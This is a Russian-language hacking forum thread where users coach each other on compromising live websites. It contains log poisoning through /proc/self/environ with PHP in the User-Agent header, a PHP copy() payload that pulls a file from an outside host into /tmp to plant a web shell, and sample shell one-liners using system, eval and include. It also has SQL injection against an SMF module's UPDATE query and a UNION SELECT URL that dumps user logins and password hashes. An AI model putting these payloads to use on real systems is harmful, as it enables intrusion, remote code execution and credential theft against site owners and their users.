Так не бывает. Давай сюда 1. Что прописано в логах (через что ты выполняешь комманды. КОД) 2. phpinfo() директивы allow_url_fopen allow_url_include magic_quotes_gpc safe_mode disable_functions 3. ls -lia (ты-же как-то качалки искал, значит возможно) 4. Как ты пытаешься залить через copy (полностью)
Или методом тыка Попробуй подменить x_forwarder_for, хотя сейчас уже мало где проверяют так, но всё же...
В статье электа написано про то, что если в значение сессион ид вставить спецсимволы,то будет ошибка и раскрытие путей. Как защитится от этого? Спрашивал очень многих, никто ничего сказать не смог.
Вопрос: Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти. Как же это замутить ))
Code: function affiliates_banners_edit_verify() { global $txt, $smcFunc, $sourcedir, $board_info, $board, $selected_boards; // Check Permission for Admin and Affiliates Manager if (!allowedTo('affiliates_manage')) fatal_lang_error('affiliates_no_permission', false); // We need an ID!! if (empty($_REQUEST['id'])) fatal_lang_error('banners_no_selected', false); // Check the banner $bannerimage = htmlspecialchars($_REQUEST['bannerimage'], ENT_QUOTES); $banner_id = $_REQUEST['id']; if (empty($bannerimage)) fatal_lang_error('banner_no_image',false); $smcFunc['db_query']('', " UPDATE {db_prefix}affiliates_banners SET image = '$bannerimage' WHERE id_banner = $banner_id LIMIT 1"); // Please redirectme to the new banner redirectexit('action=affiliates;sa=banners'); } people,тут же есть вроде инъект,и как мне его с UPDATE реализовать? P.S. просто уже мозг кипит
script.php?bannerimage=asd&id=1 and 1=(if(1=1,1,(select 1 union select 2))) мож так, не проверял да и от многих факторов зависит
jokester 1) Выполнял запросы через /proc/self/environ. PHP код писал в User-Agent. 2) allow_url_fopen = 1 allow_url_include = в phpinfo его вообще нету magic_quotes_gpc = 1 safe mode = 0 disable_functions = no value 3) ls -la пашет, проверил /tmp - все норм. 4) <? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?> когла понял, что стоит мк, пробывал так: <?php copy(base64_decode(blabla)); ?> ----------------------------------------------------------- Мне Grey уже помог с шеллом, но нихуя не объяснил. Он залил как-то вручную через пакету, но не суть... jokester, был бы рад услышать твой совет... ) P.S. Я знаю, что в чем-то не прав =\
в User-Agent пропиши <? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?> magic_quotes_gpc действует только на gpc те. на _REQUEST а на User-Agent не распространяется
Tigger Если allow_url_include в phpinfo нет, то версия пыха, как я понимаю четвёртая. Тут будет работать и инклуд удалённый скорее всего, ну а copy() уж 100%. Проблема только в кавычках. А вариантов масса. Я-же не зря спрашивал какой код ты пишешь. Именно КОД. Одно дело если это например <? system($_GET[cmd]); ?> совсем другое если <?php eval($_REQUEST[ev]); ?> или например <?php include($_REQUEST[c]); ?> Туда ведь можно записать много чего, подумай, я думаю запросто найдёшь ещё парочку. Я просто предполагаю, что Грей не просто так не объяснил, он любит по этой тематике задачки давать, поэтому фишек палить не буду, хотя они все в паблике, найдёшь без проблем
такое дело : вывожу записи лимитом,движок сайта сабдример. Code: http://сайт.ру/catalog/index.php?category=-2+union+select+1,concat(0x3a,login,pass),3,4,5,6,7+from+pmd_users+limit+1,0-- вылазит такое : login1821165f4dcc3b5aa765d61d8327deb882cf99 меняется при изминении значения лимита только эта часть: login1821165f4dcc3b5aa765d61d8327deb882cf99 вобщем что посоветуете?
L I G A Меняется окончание логина? Где разделитель-то? или concat_ws(0x3a,login,pass) или concat(login,0x3a,pass), ты уж определись
concat_ws(0x3a,login,pass) login363307:5f4dcc3b5aa765d61d8327deb882cf99 меняется: login363307:5f4dcc3b5aa765d61d8327deb882cf99